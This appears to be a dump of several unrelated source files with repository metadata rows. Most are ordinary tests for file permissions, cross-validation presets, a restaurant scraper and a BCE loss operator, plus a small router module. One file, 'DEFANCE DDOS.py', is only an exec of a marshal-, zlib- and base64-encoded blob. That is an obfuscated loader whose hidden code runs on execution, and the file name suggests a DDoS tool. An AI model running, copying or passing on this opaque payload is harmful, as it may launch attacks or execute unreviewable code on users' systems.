            assert response.headers["Content-Type"] == "application/x-ndjson"
            statuses = await status_iter_response_to_list(response.content)
            statuses = sorted(statuses, key=self.file_status_sort)
            assert statuses == [
                {
                    "path": "second",
                    "length": 0,
                    "type": "DIRECTORY",
                    "modificationTime": mock.ANY,
                    "permission": "write",
                }
            ]
            assert statuses[0]["modificationTime"] >= min_mtime_fourth
        async with client.get(
            dir_url + "/first/second", headers=headers2, params=params
        ) as response:
            assert response.status == 200
            assert response.headers["Content-Type"] == "application/x-ndjson"
            statuses = await status_iter_response_to_list(response.content)
            statuses = sorted(statuses, key=self.file_status_sort)
            # "fourth" inherits "write" from the grant on its parent;
            # "third" carries its own direct "manage" grant.
            assert statuses == [
                {
                    "path": "fourth",
                    "length": 0,
                    "type": "DIRECTORY",
                    "modificationTime": mock.ANY,
                    "permission": "write",
                },
                {
                    "path": "third",
                    "length": 0,
                    "type": "DIRECTORY",
                    "modificationTime": mock.ANY,
                    "permission": "manage",
                },
            ]
            assert statuses[0]["modificationTime"] >= min_mtime_fourth
            assert statuses[1]["modificationTime"] >= min_mtime_third
            assert statuses[1]["modificationTime"] <= min_mtime_fourth
| 37.580046 | 88 | 0.548682 | 1,617 | 16,197 | 5.350031 | 0.085343 | 0.024275 | 0.046815 | 0.074905 | 0.915732 | 0.907063 | 0.90059 | 0.855624 | 0.847879 | 0.807999 | 0 | 0.018384 | 0.338396 | 16,197 | 430 | 89 | 37.667442 | 0.788914 | 0.015744 | 0 | 0.751323 | 0 | 0 | 0.142247 | 0.030383 | 0 | 0 | 0 | 0 | 0.137566 | 1 | 0.002646 | false | 0 | 0.029101 | 0.002646 | 0.037037 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9ea07d5ca60daf24c5cef43ba8e90617dc8388f9 | 3,328 | py | Python | xcessiv/presets/tests/test_cvsetting.py | KhaledTo/xcessiv | a48dff7d370c84eb5c243bde87164c1f5fd096d5 | [
"Apache-2.0"
] | 1,362 | 2017-05-23T15:02:18.000Z | 2022-03-28T22:42:21.000Z | xcessiv/presets/tests/test_cvsetting.py | KhaledTo/xcessiv | a48dff7d370c84eb5c243bde87164c1f5fd096d5 | [
"Apache-2.0"
] | 40 | 2017-05-23T17:59:05.000Z | 2019-07-03T13:08:14.000Z | xcessiv/presets/tests/test_cvsetting.py | KhaledTo/xcessiv | a48dff7d370c84eb5c243bde87164c1f5fd096d5 | [
"Apache-2.0"
] | 123 | 2017-05-24T05:49:34.000Z | 2022-02-06T17:54:32.000Z | from __future__ import absolute_import, print_function, division, unicode_literals
import unittest
from sklearn.datasets import load_iris
from xcessiv import functions
from xcessiv.presets import cvsetting
class TestKFold(unittest.TestCase):
    """Smoke-test the k-fold CV preset's generated source code."""

    def setUp(self):
        self.X, self.y = load_iris(return_X_y=True)

    def test_k_fold_source(self):
        # Compile the preset's stored source into a throwaway module.
        source = cvsetting.k_fold['source']
        module = functions.import_string_code_as_module(source)
        assert hasattr(module, 'return_splits_iterable')
        # Consume the splits to prove the generator runs without error.
        for _ in module.return_splits_iterable(self.X, self.y):
            pass
        del module
class TestStratifiedKFold(unittest.TestCase):
    """Smoke-test the stratified k-fold CV preset's generated source."""

    def setUp(self):
        self.X, self.y = load_iris(return_X_y=True)

    def test_source(self):
        source = cvsetting.stratified_k_fold['source']
        module = functions.import_string_code_as_module(source)
        assert hasattr(module, 'return_splits_iterable')
        # Exhaust the iterable; any failure inside the preset raises here.
        for _ in module.return_splits_iterable(self.X, self.y):
            pass
        del module
class TestShuffleSplit(unittest.TestCase):
    """Smoke-test the shuffle-split CV preset's generated source."""

    def setUp(self):
        self.X, self.y = load_iris(return_X_y=True)

    def test_source(self):
        source = cvsetting.shuffle_split['source']
        module = functions.import_string_code_as_module(source)
        assert hasattr(module, 'return_splits_iterable')
        for _ in module.return_splits_iterable(self.X, self.y):
            pass
        del module
class TestStratifiedShuffleSplit(unittest.TestCase):
    """Smoke-test the stratified shuffle-split CV preset's generated source."""

    def setUp(self):
        self.X, self.y = load_iris(return_X_y=True)

    def test_source(self):
        source = cvsetting.stratified_shuffle_split['source']
        module = functions.import_string_code_as_module(source)
        assert hasattr(module, 'return_splits_iterable')
        for _ in module.return_splits_iterable(self.X, self.y):
            pass
        del module
class TestLeaveOneOut(unittest.TestCase):
    """Smoke-test the leave-one-out CV preset's generated source."""

    def setUp(self):
        self.X, self.y = load_iris(return_X_y=True)

    def test_source(self):
        source = cvsetting.leave_one_out['source']
        module = functions.import_string_code_as_module(source)
        assert hasattr(module, 'return_splits_iterable')
        for _ in module.return_splits_iterable(self.X, self.y):
            pass
        del module
class TestLeavePOut(unittest.TestCase):
    """Smoke-test the leave-p-out CV preset's generated source."""

    def setUp(self):
        self.X, self.y = load_iris(return_X_y=True)

    def test_source(self):
        source = cvsetting.leave_p_out['source']
        module = functions.import_string_code_as_module(source)
        assert hasattr(module, 'return_splits_iterable')
        for _ in module.return_splits_iterable(self.X, self.y):
            pass
        del module
class TestGroupKFold(unittest.TestCase):
    """Group k-fold preset: iris carries no group labels, so consuming the
    splits is expected to raise ValueError."""

    def setUp(self):
        self.X, self.y = load_iris(return_X_y=True)

    def test_source(self):
        source = cvsetting.group_k_fold['source']
        module = functions.import_string_code_as_module(source)
        assert hasattr(module, 'return_splits_iterable')
        splits = module.return_splits_iterable(self.X, self.y)
        # Materializing the splits without groups must fail.
        self.assertRaises(ValueError, list, splits)
        del module
class TestTimeSeriesSplit(unittest.TestCase):
    """Smoke-test the time-series split CV preset's generated source."""

    def setUp(self):
        self.X, self.y = load_iris(return_X_y=True)

    def test_source(self):
        # Bug fix: this test previously loaded cvsetting.leave_one_out
        # (copy-paste from TestLeaveOneOut), so the time-series preset was
        # never actually exercised. Load the correct preset here.
        module = functions.import_string_code_as_module(
            cvsetting.time_series_split['source'])
        assert hasattr(module, 'return_splits_iterable')
        # Consuming the iterable verifies the generated code runs cleanly.
        list(module.return_splits_iterable(self.X, self.y))
        del module
| 28.93913 | 101 | 0.704026 | 432 | 3,328 | 5.145833 | 0.138889 | 0.035987 | 0.064777 | 0.071975 | 0.82861 | 0.82861 | 0.82861 | 0.82861 | 0.812416 | 0.789924 | 0 | 0 | 0.199519 | 3,328 | 114 | 102 | 29.192982 | 0.834459 | 0 | 0 | 0.648649 | 0 | 0 | 0.067308 | 0.052885 | 0 | 0 | 0 | 0 | 0.121622 | 1 | 0.216216 | false | 0 | 0.175676 | 0 | 0.5 | 0.013514 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9ebaa5bb66d65118e375970965523a993d511790 | 4,177 | py | Python | backend/scraper/scraper_tests.py | cs130-w22/Group-A7 | 26172fa9c0b2a18fde0f569ab34e85927d941ba6 | [
"Apache-2.0"
] | null | null | null | backend/scraper/scraper_tests.py | cs130-w22/Group-A7 | 26172fa9c0b2a18fde0f569ab34e85927d941ba6 | [
"Apache-2.0"
] | 25 | 2022-03-02T19:04:43.000Z | 2022-03-08T03:39:25.000Z | backend/scraper/scraper_tests.py | cs130-w22/Group-A7 | 26172fa9c0b2a18fde0f569ab34e85927d941ba6 | [
"Apache-2.0"
] | null | null | null | import pytest
from main import Scraper
def test_invalid_city():
    """An unknown city must yield empty results from every getter."""
    scraper = Scraper()
    scraper.scrape_restaurant_info("fake_city", "2022-03-15", "2")
    for getter in (scraper.get_restaurant_times,
                   scraper.get_restaurant_hyperlinks,
                   scraper.get_restaurant_tags):
        assert getter() == {}
def test_invalid_date():
    """A nonsense date must yield empty results from every getter."""
    scraper = Scraper()
    scraper.scrape_restaurant_info("Chicago", "1000-00-00", "2")
    for getter in (scraper.get_restaurant_times,
                   scraper.get_restaurant_hyperlinks,
                   scraper.get_restaurant_tags):
        assert getter() == {}
def test_invalid_seats():
    """A negative seat count must yield empty results from every getter."""
    scraper = Scraper()
    scraper.scrape_restaurant_info("Chicago", "2022-03-15", "-1")
    for getter in (scraper.get_restaurant_times,
                   scraper.get_restaurant_hyperlinks,
                   scraper.get_restaurant_tags):
        assert getter() == {}
def test_invalid_time():
    """A negative hour (hhtime) must yield empty results from every getter."""
    scraper = Scraper()
    scraper.scrape_restaurant_info("Chicago", "2022-03-15", "2", hhtime=-1)
    for getter in (scraper.get_restaurant_times,
                   scraper.get_restaurant_hyperlinks,
                   scraper.get_restaurant_tags):
        assert getter() == {}
def test_invalid_cuisine():
    """An unknown cuisine must yield empty results from every getter."""
    scraper = Scraper()
    scraper.scrape_restaurant_info("Chicago", "2022-03-15", "2", hhtime=14, cuisine="xyz")
    for getter in (scraper.get_restaurant_times,
                   scraper.get_restaurant_hyperlinks,
                   scraper.get_restaurant_tags):
        assert getter() == {}
def test_valid_required_parameters():
    """City, date and seats alone should produce times, links and tags."""
    scraper = Scraper()
    # these parameters will not succeed after the given date
    scraper.scrape_restaurant_info("Chicago", "2022-03-15", "2")
    times = scraper.get_restaurant_times()
    assert len(times) > 0
    for slots in times.values():
        for slot in slots:
            assert "PM" in slot or "AM" in slot
    base_url = "https://www.exploretock.com"
    hrefs = scraper.get_restaurant_hyperlinks()
    assert len(hrefs) > 0
    for link in hrefs.values():
        assert len(link) > len(base_url) and "https://" in link
    # tags vary heavily between restaurants so there is not much else to test
    assert len(scraper.get_restaurant_tags()) > 0
def test_valid_with_optional_parameters():
    """Optional hour and cuisine filters should still produce full results."""
    scraper = Scraper()
    scraper.scrape_restaurant_info("Chicago", "2022-03-15", "2", hhtime=18, cuisine="american")
    times = scraper.get_restaurant_times()
    assert len(times) > 0
    for slots in times.values():
        for slot in slots:
            assert "PM" in slot or "AM" in slot
    base_url = "https://www.exploretock.com"
    hrefs = scraper.get_restaurant_hyperlinks()
    assert len(hrefs) > 0
    for link in hrefs.values():
        assert len(link) > len(base_url) and "https://" in link
    assert len(scraper.get_restaurant_tags()) > 0
def test_valid_diff_city_name():
    """A different supported city should also produce full results."""
    scraper = Scraper()
    scraper.scrape_restaurant_info("Atlanta", "2022-03-15", "2")
    times = scraper.get_restaurant_times()
    assert len(times) > 0
    for slots in times.values():
        for slot in slots:
            assert "PM" in slot or "AM" in slot
    base_url = "https://www.exploretock.com"
    hrefs = scraper.get_restaurant_hyperlinks()
    assert len(hrefs) > 0
    for link in hrefs.values():
        assert len(link) > len(base_url) and "https://" in link
    assert len(scraper.get_restaurant_tags()) > 0
def test_valid_lowercase_city_name():
    """City matching should be case-insensitive ('atlanta')."""
    scraper = Scraper()
    scraper.scrape_restaurant_info("atlanta", "2022-03-15", "2")
    times = scraper.get_restaurant_times()
    assert len(times) > 0
    for slots in times.values():
        for slot in slots:
            assert "PM" in slot or "AM" in slot
    base_url = "https://www.exploretock.com"
    hrefs = scraper.get_restaurant_hyperlinks()
    assert len(hrefs) > 0
    for link in hrefs.values():
        assert len(link) > len(base_url) and "https://" in link
    assert len(scraper.get_restaurant_tags()) > 0
def test_valid_spaced_city_name():
    """A city name containing a space ('Los Angeles') should work."""
    scraper = Scraper()
    scraper.scrape_restaurant_info("Los Angeles", "2022-03-15", "2")
    times = scraper.get_restaurant_times()
    assert len(times) > 0
    for slots in times.values():
        for slot in slots:
            assert "PM" in slot or "AM" in slot
    base_url = "https://www.exploretock.com"
    hrefs = scraper.get_restaurant_hyperlinks()
    assert len(hrefs) > 0
    for link in hrefs.values():
        assert len(link) > len(base_url) and "https://" in link
    assert len(scraper.get_restaurant_tags()) > 0
9ebb531298631ca444d4a673b24fdc4e27d1f7f5 | 7,037 | py | Python | DEFANCE DDOS.py | Sahrul-Gunawan-Cyber/LiteDefance | aeabf0016eea546902e5904fdbdcbef09300c60f | [
"Apache-2.0"
] | null | null | null | DEFANCE DDOS.py | Sahrul-Gunawan-Cyber/LiteDefance | aeabf0016eea546902e5904fdbdcbef09300c60f | [
"Apache-2.0"
] | null | null | null | DEFANCE DDOS.py | Sahrul-Gunawan-Cyber/LiteDefance | aeabf0016eea546902e5904fdbdcbef09300c60f | [
"Apache-2.0"
] | null | null | null | import marshal,zlib,base64
exec(marshal.loads(zlib.decompress(base64.b64decode("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")))) | 3,518.5 | 7,010 | 0.967458 | 219 | 7,037 | 31.086758 | 0.954338 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.147832 | 0.000284 | 7,037 | 2 | 7,010 | 3,518.5 | 0.819901 | 0 | 0 | 0 | 0 | 0.5 | 0.987781 | 0.987781 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 10 |
7b4a703d1c291c1fdc8406c05759de52c6cc6b53 | 149 | py | Python | packages/stattik/tests/src/router/__init__.py | stattikcms/stattik | 5c96d600d105461edb95a11d8050dee3c32edd1e | [
"MIT"
] | 1 | 2021-11-05T06:24:28.000Z | 2021-11-05T06:24:28.000Z | packages/stattik/tests/src/router/__init__.py | stattikcms/stattik | 5c96d600d105461edb95a11d8050dee3c32edd1e | [
"MIT"
] | null | null | null | packages/stattik/tests/src/router/__init__.py | stattikcms/stattik | 5c96d600d105461edb95a11d8050dee3c32edd1e | [
"MIT"
] | null | null | null | from loguru import logger
import stattik.routing
from .routes import routes
def create_router():
    """Construct the application's router wired with this package's routes."""
    router = stattik.routing.create_router(routes)
    return router
| 16.555556 | 48 | 0.798658 | 20 | 149 | 5.85 | 0.55 | 0.239316 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.14094 | 149 | 8 | 49 | 18.625 | 0.914063 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.6 | 0.2 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
7b6d52aeccb7526f2c699cfb4ded1f2eaa537f66 | 13,114 | py | Python | test/cnnl/op_test/test_bce.py | Cambricon/catch | 2625da389f25a67066d20fb6b0c38250ef98f8ab | [
"BSD-2-Clause"
] | 20 | 2022-03-01T11:40:51.000Z | 2022-03-30T08:17:47.000Z | test/cnnl/op_test/test_bce.py | Cambricon/catch | 2625da389f25a67066d20fb6b0c38250ef98f8ab | [
"BSD-2-Clause"
] | null | null | null | test/cnnl/op_test/test_bce.py | Cambricon/catch | 2625da389f25a67066d20fb6b0c38250ef98f8ab | [
"BSD-2-Clause"
] | null | null | null | from __future__ import print_function
import sys
import os
os.environ['ENABLE_CNNL_TRYCATCH'] = 'OFF' # pylint: disable=all
import copy
from itertools import product
import unittest
import logging
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch_mlu.core.mlu_model as ct
cur_dir = os.path.dirname(os.path.abspath(__file__))
# Make the shared test helpers (common_utils) importable from the repo root.
sys.path.append(cur_dir + "/../../")
from common_utils import testinfo, TestCase # pylint: disable=C0411, C0413
# Verbose logging aids debugging of CNNL op failures.
logging.basicConfig(level=logging.DEBUG)
class TestBceOps(TestCase):
    """CNNL binary cross-entropy (BCE) operator tests.

    Each test builds random inputs on CPU, runs the same loss on CPU and on
    the MLU device, and compares the results with an MSE tolerance of 3e-3
    via ``assertTensorsEqual``. Variants cover contiguous, non-contiguous
    (sliced) and channels-last inputs, forward and backward, with and
    without a per-element ``weight`` tensor, for all three reductions.
    """
    # TODO(guyi):issue:303 (fixme) # pylint: disable=W0511
    # 1)pytorch1.6 logic is different with 1.3
    # and some boundary values can't be passed
    # 2)here logic doesn't add offset value, later will fix
    # @unittest.skip("not test")
    @testinfo()
    def test_bce(self):
        """Forward nn.BCELoss on contiguous tensors vs CPU reference."""
